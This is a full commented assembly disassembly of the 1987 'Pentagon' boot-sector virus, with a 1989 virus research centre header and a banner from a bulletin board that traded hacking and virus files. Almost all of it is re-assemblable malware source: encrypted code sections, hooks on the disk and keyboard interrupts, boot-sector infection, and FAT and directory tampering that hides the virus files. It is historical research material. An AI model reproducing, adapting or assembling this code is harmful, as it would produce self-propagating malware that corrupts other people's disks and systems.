;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=- ; ; -=] P E R F E C T C R I M E [=- ; ; -=] +31.(o)79.426o79 [=- ; ; -=] [=- ; ; -=] For All Your H/P/A/V Files [=- ; ; -=] SysOp: Peter Venkman [=- ; ; -=] [=- ; ; -=] +31.(o)79.426o79 [=- ; ; -=] P E R F E C T C R I M E [=- ; ; -=][][][][][][][][][][][][][][][=- ; ; ; ; *** NOT FOR GENERAL DISTRIBUTION *** ; ; ; ; This File is for the Purpose of Virus Study Only! It Should not be Passed ; ; Around Among the General Public. It Will be Very Useful for Learning how ; ; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; ; Experience can Turn it Into a far More Malevolent Program Than it Already ; ; Is. Keep This Code in Responsible Hands! ; ; ; ;****************************************************************************; page 65,132 title The 'Pentagon' Virus ; ��������������������������������������������������������������������������ͻ ; � British Computer Virus Research Centre � ; � 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England � ; � Telephone: Domestic 0273-26105, International +44-273-26105 � ; � � ; � The 'Pentagon' Virus � ; � Disassembled by Joe Hirst, March 1989 � ; � � ; � Copyright (c) Joe Hirst 1989. � ; � � ; � This listing is only to be made available to virus researchers � ; � or software writers on a need-to-know basis. � ; ��������������������������������������������������������������������������ͼ ; The disassembly has been tested by re-assembly using MASM 5.0. ; The code section between offsets 59H and C4H (which is normally ; encrypted) appears to have been separately assemblied using A86. ; Virus is possibly an honorary term, at least for this sample, ; as all attempts to run it have so far failed. ; This virus consists of a boot sector and two files. ; The boot sector is a normal PCDOS 3.20 boot sector with three ; changes: ; 1. The OEM name 'IBM' has been changed to 'HAL'. ; 2. The first part of the virus code overwrites 036H to 0C5H. ; 3. 100H-122H has been overwritten by a character string. ; The name of the first file is the hex character 0F9H. This file ; contains the rest of the virus code followed by the original boot ; sector. ; The name of the second file is PENTAGON.TXT. This file does not ; appear to be used in any way or contain any meaningful data. ; Both files are created without the aid of DOS, and the first ; file is accessed by its stored absolute location. ; Four different sections of the virus are separately encrypted: ; 1. 004AH - 004BH, key 0ABCDH - load decryption key ; 2. 0059H - 00C4H, key 0FCH - rest of virus code in boot sector. ; 3. 0791H - 07DFH, key 0AAH - the file name and copyright message. ; 4. 0800H - 09FFH, key 0FCH - the original boot sector. SEG70 SEGMENT AT 70H ASSUME CS:SEG70 EXIT: SEG70 ENDS BOOT SEGMENT AT 0 ORG 413H BW0413 DW ? ORG 417H BB0417 DB ? ORG 51CH BW051C DW ? ORG 7C0BH DW7C0B DW ? ORG 7C18H DW7C18 DW ? DW7C1A DW ? ORG 7C2AH DB7C2A DB ? ORG 7C37H DW7C37 DW ? DW7C39 DW ? DB7C3B DB ? DB7C3C DB ? DW7C3D DW ? ORG 7DB7H DB7DB7 DB ? ORG 7DFDH DB7DFD DB ? ORG 7E00H DW7E00 DW ? ; DW008F - Track and sector of rest of code DW7E02 DW ? ; DW0091 - Head and drive of rest of code DW7E04 DW ? ; DW0093 - Segment address of virus BOOT ENDS CODE SEGMENT BYTE PUBLIC 'CODE' ASSUME CS:CODE,DS:CODE IF1 ORG 206H BP0095X LABEL NEAR ENDIF ORG 0 START: JMP BP0036 DB 'HAL 3.2' DW 512 ; BPB001 - Bytes per sector DB 2 ; BPB002 - Sectors per allocation unit DW 1 ; BPB003 - Reserved sectors DB 2 ; BPB004 - Number of FATs DW 112 ; BPB005 - Number of root dir entries DW 720 ; BPB006 - Number of sectors DB 0FDH ; BPB007 - Media Descriptor DW 2 ; BPB008 - Number of sectors per FAT DW 9 ; BPB009 - Sectors per track DW 2 ; BPB010 - Number of heads DW 0 ; BPB011 - Number of hidden sectors (low order) BPB012 DW 0 ; Number of hidden sectors (high order) DB 10 DUP (0) HEADNO DB 0 ; Interrupt 30 (1EH) - Disk parameter table DSKTAB DB 4 DUP (0), 0FH, 4 DUP (0) DB 1, 0 BP0036: CLI MOV AX,CS ; \ Set SS to CS MOV SS,AX ; / MOV SP,0F000H ; Set stack pointer MOV DS,AX ; Set DS to CS STI MOV BP,OFFSET BP0044+7C00H BP0044: XOR WORD PTR [BP+6],0ABCDH ; Decrypt key instruction NOP DW004A EQU THIS WORD MOV DH,0FCH ; Decryption key MOV BP,OFFSET BP0059+7C00H ; Decryption start address MOV CX,OFFSET DB00C5-BP0059 ; Length to decrypt BP0052: XOR [BP+00],DH ; Decrypt a byte INC BP ; Next byte LOOP BP0052 ; Repeat for all of it NOP BP0059: XOR DW004A+7C00H,0ABCDH ; Re-encrypt key instruction MOV AX,BW0413 ; Get RAM size in K SUB AX,0005 ; Subtract five K MOV BW0413,AX ; Replace amended RAM size MOV CL,06 ; Bits to move SHL AX,CL ; Convert to segment address MOV DW0093+7C00H,AX ; Save segment address NOP MOV ES,AX ; Set ES to this segment XOR DI,DI ; Move to start MOV SI,7C00H ; From start of boot sector buffer MOV CX,0200H ; Move one sector CLD REPZ MOVSB ; Move sector to high-core NOP ; Move next section of code to a safe area MOV DI,200H+7C00H MOV SI,OFFSET DW008F+7C00H MOV CX,OFFSET DB00C5-DW008F ; Length to move PUSH DS ; \ Set ES to DS POP ES ; / CLD REPZ MOVSB ; Copy program section JMP BP0095X ; This is BP0095 in new location DW008F DW 0B02H ; Track and sector of rest of code DW0091 DW 100H ; Head and drive of rest of code DW0093 DW 9EC0H ; Segment address of virus BP0095: MOV CX,0004 ; Number of retries BP0098: PUSH CX MOV CX,DW7E00 ; Get track and sector number MOV DX,DW7E02 ; Get head and drive number MOV ES,DW7E04 ; Get buffer segment address MOV BX,0200H ; Buffer offset MOV AX,0201H ; Read one sector INT 13H ; Disk I/O JNB BP00B8 ; Branch if no error POP CX XOR AH,AH ; Reset floppy disk sub-system INT 13H ; Disk I/O LOOP BP0098 ; Retry INT 18H ; Drop into basic BP00B8: POP CX MOV AX,OFFSET DW7E04 ; Address segment address CLI MOV SP,AX ; Point SP at segment address STI MOV AX,0200H ; \ Address of second section PUSH AX ; / RETF DB00C5 DB 50H ; The rest of this sector is a normal PCDOS 3.20 boot sector ; which has been overwritten at 100H-122H by a character string DB 61H, 0 XOR AH,AH INT 16H POP SI POP DS POP [SI] DW00D0 DW 0B06H ; Track and sector numbers DW00D2 DW 0100H ; Head and drive numbers DB 19H MOV SI,OFFSET DB7DB7 JMP NEAR PTR DB00C5 MOV AX,BW051C XOR DX,DX DIV DW7C0B INC AL MOV DB7C3C,AL MOV AX,DW7C37 MOV DW7C3D,AX MOV BX,0700H MOV AX,DW7C37 CALL BP0137 MOV AX,DW7C18 SUB AL,DB7C3B INC AX PUSH AX DB '(c) 1987 The Pentagon, Zorell Group' DB 7CH JMP FAR PTR EXIT BP0129: LODSB OR AL,AL JZ BP0150 MOV AH,0EH MOV BX,7 INT 10H JMP BP0129 BP0137: XOR DX,DX DIV DW7C18 INC DL MOV DB7C3B,DL XOR DX,DX DIV DW7C1A MOV DB7C2A,DL MOV DW7C39,AX BP0150: RET MOV AH,2 MOV DX,DW7C39 MOV CL,6 SHL DH,CL OR DH,DB7C3B MOV CX,DX XCHG CH,CL MOV DL,DB7DFD MOV DH,DB7C2A INT 13H RET DB 0DH, 0AH, 'Non-System disk or disk error', 0DH, 0AH DB 'Replace and strike any key when ready', 0DH, 0AH, 0 DB 0DH, 0AH, 'Disk Boot failure', 0DH, 0AH, 0 DB 'IBMBIO COMIBMDOS COM' ORG 01FEH DW 0AA55H ; Second sector of virus BP0200: CLI MOV SP,0F000H ; Reset stack pointer STI XOR AX,AX ; \ Address zero MOV DS,AX ; / MOV BX,004CH ; INT 13H jump address MOV BP,01A0H ; INT 68H jump address CMP WORD PTR DS:[BP+0],0 ; Is INT 68H in use JE BP0219 ; Branch if not JMP BP024E BP0219: MOV AX,[BX] ; Get INT 13H offset MOV DS:[BP+0],AX ; Set INT 68H to this offset MOV AX,[BX+2] ; Get INT 13H segment MOV DS:[BP+2],AX ; Set INT 68H to this segment MOV WORD PTR [BX],OFFSET BP04C4 ; Set address of INT 13H routine MOV AX,CS ; \ Set INT 13H segment MOV [BX+2],AX ; / MOV BX,0024H ; INT 9 jump address MOV BP,01A4H ; INT 69H jump address MOV AX,[BX] ; Get INT 9 offset MOV DS:[BP],AX ; Set INT 69H to this offset MOV AX,[BX+2] ; Get INT 9 segment MOV DS:[BP+2],AX ; Set INT 69H to this segment MOV WORD PTR [BX],OFFSET BP0709 ; Set address of INT 9 routine MOV AX,CS ; \ Set INT 9 segment MOV [BX+02],AX ; / JMP BP0254 BP024E: MOV BX,OFFSET BW0413 ; Address size of RAM ADD WORD PTR [BX],5 ; Restore the 5K BP0254: MOV BP,OFFSET DW008F ; Address virus pointer MOV CX,CS:[BP] ; Get track and sector MOV DX,CS:[BP+2] ; Get head and device MOV BX,0200H ; Address second sector MOV CX,3 ; Three sectors to read BP0265: PUSH CX ; Save read count MOV AX,0201H ; Read one sector MOV CX,CS:[BP] ; Get track and sector CALL BP0300 ; Address to next sector MOV CS:[BP],CX ; Save new track and sector ADD BX,0200H ; Address next buffer area CALL BP031B ; Read from disk JNB BP0280 ; Branch if no error POP CX INT 18H ; Drop into basic ; Read file, first sector BP0280: POP CX ; Retrieve read count LOOP BP0265 ; Repeat for other sectors MOV BP,OFFSET DW00D0 ; Address file pointers MOV CX,CS:[BP] ; Get track and sector MOV DX,CS:[BP+2] ; Get head and drive MOV BX,1000H ; Buffer address MOV AX,0201H ; Read one sector CALL BP031B ; Read from disk JNB BP029B ; Branch if no error INT 18H ; Drop into basic ; Read file, second sector BP029B: CALL BP0300 ; Address to next sector ADD BX,0200H ; Update buffer address MOV AX,0201H ; Read one sector CALL BP031B ; Read from disk JNB BP02AC ; Branch if no error INT 18H ; Drop into basic BP02AC: LEA CX,DB07E0 ; Address end of encrypted LEA BX,DB0791 ; Address start of encrypted SUB CX,BX ; Length to decrypt MOV AL,0AAH ; Load encryption key PUSH CS ; \ Set DS to CS POP DS ; / CALL BP0315 ; Decrypt MOV AX,CS ; \ MOV ES,AX ; ) Set ES & DS to CS MOV DS,AX ; / MOV DI,0100H ; Middle of 1st sector MOV SI,OFFSET DB07BC ; Address copyright message MOV CX,0023H ; Length of copyright message REPZ MOVSB ; Copy copyright message PUSH CS ; \ Set DS to CS POP DS ; / MOV CX,0200H ; Length to decrypt MOV BX,0800H ; Address boot sector store MOV AL,0FCH ; Load encryption key CALL BP0315 ; Decrypt XOR AX,AX ; \ Segment zero MOV ES,AX ; / MOV DI,7C00H ; Boot sector buffer MOV SI,0800H ; Address boot sector store MOV CX,0200H ; Sector length CLD REPZ MOVSB ; Copy boot sector DB 0EAH ; Far jump to boot sector DW 7C00H, 0 DB 16 DUP (0) ; Address to next sector BP0300: INC CL ; Increment sector number CMP CL,0AH ; Is it sector ten? JL BP0314 ; Branch if not MOV CL,1 ; Set sector to one INC DH ; Increment head CMP DH,2 ; Is it head two? JL BP0314 ; Branch if not XOR DH,DH ; Set head to zero INC CH ; Increment track BP0314: RET ; Encrypt/decrypt BP0315: XOR [BX],AL ; Encrypt a byte INC BX ; Address next byte LOOP BP0315 ; Repeat for count RET ; Read from or write to disk BP031B: PUSH SI PUSH DI MOV SI,AX ; Save function MOV DI,CX ; Save track and sector MOV CX,3 ; Number of retries BP0324: PUSH CX MOV AX,SI ; Retrieve function MOV CX,DI ; Retrieve track and sector INT 68H ; Disk I/O JNB BP0338 ; Branch if no error XOR AH,AH ; Reset sub-system INT 68H ; Disk I/O POP CX ; Retrieve number of retries LOOP BP0324 ; Retry STC JMP BP033B BP0338: POP CX ; Retrieve number of retries MOV CX,DI ; Retrieve track and sector BP033B: POP DI POP SI RET ; Find unused FAT entry pair BP033E: PUSH AX PUSH DX PUSH ES PUSH DI PUSH CS POP ES MOV DX,CX ; Initial cluster number XOR AL,AL ; Search for zero BP0348: MOV CX,3 ; Three bytes to check MOV DI,BX ; Address FAT entry pair REPZ SCASB ; Scan for non-zero CMP CX,0 ; Is FAT pair unused JE BP0361 ; Branch if yes ADD BX,3 ; Address next entry pair ADD DX,2 ; Update entry count CMP DX,0162H ; Entry 354? JLE BP0348 ; Process entry pair if not STC BP0361: MOV CX,DX ; Cluster number found POP DI POP ES POP DX POP AX RET ; Find and flag an unused entry BP0368: TEST WORD PTR [BX],0FFFH ; Test first FAT entry JZ BP0384 ; Branch if unused INC CX ; Next entry number INC BX ; Address 2nd entry TEST WORD PTR [BX],0FFF0H ; Test second FAT entry JZ BP038B ; Branch if unused INC CX ; Next entry number ADD BX,2 ; Address next entry pair CMP CX,0163H ; Entry 355? JLE BP0368 ; Process next FAT pair if not STC JMP BP0390 BP0384: OR WORD PTR [BX],0FFFH ; Flag 1st FAT entry EOF JMP BP038F BP038B: OR WORD PTR [BX],0FFF0H ; Flag 2nd FAT entry EOF nop ; ** length adjustment, MASM 5.0 BP038F: CLC BP0390: RET ; Unflag Brain virus bad clusters BP0391: PUSH AX PUSH BX PUSH CX PUSH DX MOV DX,CX BP0397: MOV AX,[BX] ; Get FAT entry AND AX,0FFFH ; Isolate FAT entry CMP AX,0FF7H ; Bad cluster? JE BP03B8 ; Branch if yes INC DX ; Add to cluster number INC BX ; Address next entry MOV AX,[BX] ; Get FAT entry MOV CL,4 ; Bits to move SHR AX,CL ; Move FAT entry CMP AX,0FF7H ; Bad Cluster? JE BP03C8 ; Branch if yes INC DX ; Add to cluster number ADD BX,2 ; Address next pair of entries CMP DX,015FH ; Entry 351? JLE BP0397 ; Process this pair if not BP03B8: MOV WORD PTR [BX],0 ; \ MOV BYTE PTR [BX+2],0 ; ) Clear three entries XOR WORD PTR [BX+3],0FF7H ; / JMP BP03D5 BP03C8: XOR WORD PTR [BX],0FF7H ; \ MOV WORD PTR [BX+2],0 ; ) Clear three entries MOV BYTE PTR [BX+4],0 ; / BP03D5: POP DX POP CX POP BX POP AX RET ; Convert cluster number to track, head and sector BP03DA: PUSH AX PUSH BX SUB CX,2 ; Subtract number of 1st cluster ADD CX,CX ; Two sectors per cluster ADD CX,0CH ; Add sector num of 1st cluster MOV AX,CX ; Copy sector number PUSH AX ; Save sector number MOV BL,9 ; Nine sectors per track DIV BL ; Divide by sectors per track INC AH ; First sector is one MOV CL,AH ; Move sector number XOR AH,AH ; Clear top of register MOV BL,2 ; Two heads DIV BL ; Divide by heads MOV DH,AH ; Move head number POP AX ; Retrieve sector number MOV BL,12H ; 18 sectors per track (both sides) DIV BL ; Divide by sectors per track MOV CH,AL ; Move track number POP BX POP AX RET ; Update directory BP0401: PUSH BX PUSH CX PUSH DX PUSH SI PUSH DI MOV CX,000FH ; Fifteen entries per sector XOR DI,DI ; Start of sector CMP AX,7 ; Is this first dir sector JNE BP0416 ; Branch if not SUB CX,3 ; Subtract three from count ADD DI,60H ; Address fourth entry BP0416: CMP BYTE PTR CS:DB07E1,0FFH ; Is Brain switch on? JNE BP0443 ; Branch if not CMP BYTE PTR ES:[BX+DI+0BH],8 ; Is it volume label? JNE BP0443 ; Branch if not MOV BYTE PTR CS:DB07E2,0FFH ; Set directory update switch on PUSH SI PUSH DI PUSH CX ADD DI,BX ; Add sector address LEA SI,DB07B1 ; Address label MOV CX,000BH ; Length of new label CLD REPZ MOVSB ; Copy label MOV BYTE PTR CS:DB07E1,0 ; Set Brain switch off POP CX POP DI POP SI BP0443: CMP BYTE PTR ES:[BX+DI],0 ; Is entry unused? JE BP0452 ; Branch if yes ADD DI,20H ; Address next entry LOOP BP0416 ; Process next entry STC JMP BP0487 BP0452: ADD DI,BX ; Add sector address MOV BX,DI ; Move entry address MOV BYTE PTR [BX],0F9H ; "Filename" MOV BYTE PTR [BX+0BH],23H ; Read-only, hidden attributes MOV CX,CS:DW0784 ; Get virus cluster number MOV [BX+1AH],CX ; Store starting cluster MOV WORD PTR [BX+1CH],0800H ; \ File size 2048 MOV WORD PTR [BX+1EH],0 ; / ADD DI,20H ; Address next entry MOV BX,DI ; Move entry address LEA SI,DB0791 ; Address start of encrypted MOV CX,0020H ; One complete entry to move CLD REPZ MOVSB ; Move entry MOV CX,CS:DW0786 ; Get file cluster number MOV [BX+1AH],CX ; Store starting cluster CLC BP0487: POP DI POP SI POP DX POP CX POP BX RET ; Read actual boot sector - Brain infected BP048D: PUSH AX PUSH CX PUSH DX MOV CX,[BX+7] ; Get track and sector MOV DH,[BX+6] ; Get head number MOV AX,0201H ; Read one sector CALL BP031B ; Read from disk POP DX POP CX POP AX RET ; Generate a sound BP04A0: MOV BP,1 ; One loop MOV AL,0B6H ; Counter two, both bytes, sq wave OUT 43H,AL ; Set PIT control register MOV AX,0533H ; Sound frequency OUT 42H,AL ; Send first byte MOV AL,AH ; Get second byte OUT 42H,AL ; Send second byte IN AL,61H ; Get port B MOV AH,AL ; Save port B value OR AL,3 ; Set sound bits on OUT 61H,AL ; Send port B SUB CX,CX ; Maximum loop count BP04BA: LOOP BP04BA ; Delay DEC BP ; Decrement count of loops JNZ BP04BA ; Branch if not zero (it won't be) MOV AL,AH ; Recover original port B OUT 61H,AL ; Send port B RET ; Int 13H routine BP04C4: STI PUSH AX PUSH BX PUSH CX PUSH DX PUSH DS PUSH SI PUSH ES PUSH DI MOV CS:DB0790,DL ; Save device CMP AH,2 ; Is function a read? JE BP04DA ; Branch if yes JMP BP06FC ; Pass on to BIOS BP04DA: DEC CS:DB07E0 ; Decrement count JZ BP04E4 ; Infect when zero JMP BP06FC ; Pass on to BIOS ; Get boot sector BP04E4: MOV BYTE PTR CS:DB07E0,10H ; Set count to 16 PUSH CS ; \ POP AX ; \ Set DS & ES to CS MOV DS,AX ; / MOV ES,AX ; / MOV BX,0800H ; Address boot sector store MOV CX,1 ; Track zero, sector one MOV DH,0 ; Head zero MOV DL,CS:DB0790 ; Load device MOV AX,0201H ; Read one sector CALL BP031B ; Read from disk JNB BP0508 ; Branch if no error JMP BP06FC ; Pass on to BIOS ; Check for Brain virus BP0508: CMP WORD PTR [BX+4],1234H ; Is it a Brain boot sector? JNE BP051D ; Branch if not MOV BYTE PTR CS:DB07E1,0FFH ; Set Brain switch on CALL BP048D ; Read actual boot sector JNB BP052D ; Branch if no error JMP BP06FC ; Pass on to BIOS ; Check for Pentagon virus BP051D: MOV BYTE PTR CS:DB07E1,0 ; Set Brain switch off CMP WORD PTR [BX+4AH],577BH ; Is it infected by pentagon? JNE BP052D ; Branch if not JMP BP06FC ; Pass on to BIOS ; Check for DOS boot sector BP052D: CMP WORD PTR [BX+01FEH],0AA55H ; Is it a valid boot sector JE BP0538 ; Branch if yes JMP BP06FC ; Pass on to BIOS ; Get first FAT sector BP0538: ADD BX,0200H ; Update buffer address INC CL ; Next sector MOV AX,0201H ; Read one sector CALL BP031B ; Read from disk JNB BP0549 ; Branch if no error JMP BP06FC ; Pass on to BIOS ; Check media byte BP0549: CMP BYTE PTR [BX],0FDH ; Is it 360K disk JE BP0551 ; Branch if yes JMP BP06FC ; Pass on to BIOS ; Get second sector of FAT BP0551: ADD BX,0200H ; Update buffer address INC CL ; Next sector MOV AX,0201H ; Read one sector CALL BP031B ; Read from disk JNB BP0562 ; Branch if no error JMP BP06FC ; Pass on to BIOS BP0562: CMP BYTE PTR CS:DB07E1,0FFH ; Test Brain switch JNE BP0573 ; Branch if off MOV BX,0A03H ; Address first cluster in FAT MOV CX,2 ; First cluster is number two CALL BP0391 ; Unflag Brain virus bad clusters BP0573: MOV BX,0A96H ; \ Start from cluster 100 MOV CX,0064H ; / CALL BP033E ; Find unused FAT entry pair JNB BP0581 ; Branch if no error JMP BP06FC ; Pass on to BIOS BP0581: MOV CS:DW0784,CX ; Save virus cluster number INC CX ; Next cluster number MOV [BX],CX ; Put it in first FAT entry OR WORD PTR [BX+01],0FFF0H ; Flag 2nd entry as EOF nop ; ** length adjustment, MASM 5.0 DEC CX ; Set cluster number back CALL BP03DA ; Cluster num to trck/hd/sect MOV CS:DW0788,CX ; Save virus track & sector MOV CS:DW078A,DX ; Save virus head and drive PUSH BP MOV BP,OFFSET DW008F ; Address virus pointer MOV CS:[BP+00],CX ; Save virus track & sector MOV CS:[BP+03],DH ; Save virus head POP BP MOV BX,0A96H ; \ Start from cluster 100 MOV CX,0064H ; / CALL BP0368 ; Find an unused FAT entry JNB BP05B7 ; Branch if no error JMP BP06FC ; Pass on to BIOS BP05B7: MOV CS:DW0786,CX ; Save file cluster number CALL BP03DA ; Cluster num to trck/hd/sect MOV CS:DW078C,CX ; Save file track & sector MOV CS:DW078E,DX ; Save file head and drive PUSH BP MOV BP,OFFSET DW00D0 ; Address file pointers MOV CS:[BP],CX ; Save track and sector MOV CS:[BP+3],DH ; Save head POP BP MOV AL,0FCH ; Load encryption key MOV BX,0800H ; Address boot sector store MOV CX,0200H ; Length to encrypt CALL BP0315 ; Encrypt/decrypt MOV BYTE PTR CS:DB07E0,20H ; Set count to 32 LEA CX,DB07E0 ; Address end of encrypted LEA BX,DB0791 ; Address start of encrypted SUB CX,BX ; Length to encrypt MOV AL,0AAH ; Load encryption key CALL BP0315 ; Encrypt/decrypt MOV BX,0200H ; Virus second sector MOV AX,0301H ; Write one sector MOV CX,CS:DW0788 ; Get virus track & sector MOV DX,CS:DW078A ; Get virus head and drive MOV DL,CS:DB0790 ; Load device CALL BP031B ; Write to disk JNB BP0613 ; Branch if no error JMP BP06FC ; Pass on to BIOS BP0613: MOV AX,3 ; Three sectors to write BP0616: PUSH AX ; Save write count ADD BX,0200H ; Next sector buffer MOV AX,0301H ; Write one sector CALL BP0300 ; Address to next sector CALL BP031B ; Write to disk JB BP062D ; Branch if error POP AX ; Retrieve write count DEC AX ; Decrement count JNZ BP0616 ; Repeat for each sector JMP BP0631 BP062D: POP AX JMP BP06FC ; Pass on to BIOS ; Write file BP0631: LEA CX,DB07E0 ; Address end of encrypted LEA BX,DB0791 ; Address start of encrypted SUB CX,BX ; Length to encrypt MOV AL,0AAH ; Load encryption key CALL BP0315 ; Encrypt/decrypt MOV BYTE PTR CS:DB07E0,10H ; Set count to 16 MOV CX,CS:DW078C ; Get file track & sector MOV DX,CS:DW078E ; Get file head and drive MOV DL,CS:DB0790 ; Load device MOV BX,1000H ; Address file buffer MOV AX,2 ; Two sectors to write BP065B: PUSH AX ; Save write count MOV AX,0301H ; Write one sector CALL BP031B ; Write to disk JB BP062D ; Branch if error CALL BP0300 ; Address to next sector ADD BX,0200H ; Address next sector buffer POP AX ; Retrieve write count DEC AX ; Decrement write count JNZ BP065B ; Write each sector MOV BX,OFFSET BP0059 ; Start of encrypted MOV CX,OFFSET DB00C5-BP0059 ; Length to encrypt MOV AL,0FCH ; Load encryption key CALL BP0315 ; Encrypt XOR BX,BX ; Address start of virus MOV AX,0301H ; Write one sector MOV CX,1 ; Track zero, sector 1 XOR DH,DH ; Head zero CALL BP031B ; Write to disk JNB BP068C ; Branch if no error JMP BP06FC ; Pass on to BIOS ; Write 1st FAT sector BP068C: MOV BX,OFFSET BP0059 MOV CX,OFFSET DB00C5-BP0059 ; Length to decrypt MOV AL,0FCH ; Load encryption key CALL BP0315 ; Decrypt MOV BX,0A00H ; Address 1st FAT sector MOV AX,0301H ; Write one sector MOV CX,2 ; Track zero, sector 2 CALL BP031B ; Write to disk JNB BP06A8 ; Branch if no error JMP BP06FC ; Pass on to BIOS ; Write 2nd FAT sector BP06A8: ADD BX,0200H ; Address 2nd FAT sector MOV AX,0301H ; Write one sector INC CX ; Next sector CALL BP031B ; Write to disk JNB BP06B8 ; Branch if no error JMP BP06FC ; Pass on to BIOS ; Create directory entries BP06B8: MOV BX,0E00H ; Address directory MOV CX,5 ; Track zero, sector 5 XOR DH,DH ; Head zero MOV AX,7 ; Seven sectors to read BP06C3: PUSH AX ; Save read count MOV AX,0201H ; Read one sector CALL BP0300 ; Address to next sector CALL BP031B ; Read from disk JB BP06F1 ; Branch if error POP AX ; \ Retrieve and save read count PUSH AX ; / MOV BYTE PTR CS:DB07E2,0 ; Set directory update switch off CALL BP0401 ; Update directory JNB BP06F5 ; Branch if entry found CMP BYTE PTR CS:DB07E2,0FFH ; Test directory update switch JNE BP06EA ; Branch if off MOV AX,0301H ; Write one sector CALL BP031B ; Write to disk BP06EA: POP AX ; Retrieve sector count DEC AX ; Decrement sector count JNZ BP06C3 ; Repeat for each sector JMP BP06FC ; Pass on to BIOS BP06F1: POP AX JMP BP06FC ; Pass on to BIOS BP06F5: POP AX MOV AX,0301H ; Write one sector CALL BP031B ; Write to disk BP06FC: POP DI POP ES POP SI POP DS POP DX POP CX POP BX POP AX INT 68H ; Disk I/O RETF 2 ; Int 9 routine BP0709: PUSH AX PUSH BX PUSH DS MOV BYTE PTR CS:DB07E3,0 ; Set off reboot switch XOR AX,AX ; \ Address zero MOV DS,AX ; / IN AL,60H ; Get keyboard token MOV BX,OFFSET BB0417 ; Address Key states TEST BYTE PTR [BX],8 ; Alt key depressed? JZ BP0736 ; Branch if not TEST BYTE PTR [BX],4 ; Ctrl key depressed? JZ BP0736 ; Branch if not CMP AL,53H ; Del character token? JNE BP0736 ; Branch if not XOR BYTE PTR [BX],0CH ; Set off Alt & Ctrl states XOR AL,AL ; \ ? OUT 60H,AL ; / MOV BYTE PTR CS:DB07E3,0FFH ; Set on reboot switch BP0736: POP DS POP BX POP AX INT 69H ; Keyboard I/O PUSHF CMP BYTE PTR CS:DB07E3,0FFH ; Test reboot switch JNE BP0765 ; Branch if off POPF MOV AX,3 ; Set mode three INT 10H ; VDU I/O CLI MOV AL,0AH ; Repeat delay 10 times XOR CX,CX ; Maximum loop BP074F: LOOP BP074F ; Delay DEC AL ; Decrement delay count JNZ BP074F ; Repeat delay for count CALL BP04A0 ; Generate a sound XOR CX,CX ; Maximum loop BP075A: LOOP BP075A ; Delay MOV BYTE PTR CS:DB07E0,5 ; Set count to 5 STI INT 19H ; Disk bootstrap BP0765: POPF RETF 2 DB 27 DUP (0) DW0784 DW 0064H ; Cluster number of virus DW0786 DW 0066H ; Cluster number of file DW0788 DW 0B02H ; Virus track & sector DW078A DW 0101H ; Virus head and drive DW078C DW 0B06H ; File track and sector DW078E DW 0101H ; File head and drive DB0790 DB 1 ; Device number DB0791 DB 'PENTAGONTXT', 21H, 17 DUP (0), 4, 0, 0 DB07B1 DB 'Pentagon,ZG' DB07BC DB '(c) 1987 The Pentagon, Zorell Group$' DB07E0 DB 20H ; Infection count DB07E1 DB 0FFH ; Infected by Brain switch DB07E2 DB 0 ; Directory update switch DB07E3 DB 0 ; Reboot switch DB ' first sector in segment', 0DH, 0AH, 9, 6DH CODE ENDS END START